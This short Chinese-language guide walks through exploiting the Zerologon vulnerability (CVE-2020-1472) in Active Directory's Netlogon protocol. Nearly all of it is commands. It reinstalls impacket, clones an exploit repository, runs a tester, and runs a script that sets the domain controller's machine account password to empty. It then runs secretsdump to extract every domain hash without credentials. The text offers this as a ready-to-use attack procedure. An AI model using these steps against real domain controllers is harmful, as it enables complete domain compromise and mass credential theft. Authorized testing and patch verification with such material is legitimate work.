一组用于测试和利用 zerologon 漏洞 (CVE-2020-1472) 的脚本。
ZeroLogon 是一个漏洞,允许我们利用 Microsoft Active Directory Netlogon 远程协议 (MS-NRPC) 中的加密缺陷,该协议允许用户使用 NTLM 登录服务器。
在执行漏洞利用之前,我们必须知道我们需要一个不同版本的 impacket,为此我们将执行以下操作。
apt remove --purge impacket-scripts python3-impacket
git clone https://github.com/SecureAuthCorp/impacket.git
cd impacket
pip install .
git clone https://github.com/Nekoox/zerologon.git
cd zerologon
pip install -r requirements.txt
python3 tester.py <DC-NAME> <ip-address>
如果目标域控制器存在漏洞,将会显示一条消息:"成功!域控制器可以被 Zerologon 攻击完全攻陷。"
否则,即目标域控制器没有漏洞(因为安全漏洞已被修补),我们将收到以下消息:"攻击失败。目标可能已修补。"
python3 empty_pw.py <DC-NAME> <ip-address>
如果域控制器存在漏洞,运行漏洞利用程序后,它应该没有密码。
> secretsdump.py -just-dc <DC-NAME>\$@<ip-address>
执行此命令后,我们就能看到域的所有哈希值,无需任何凭证。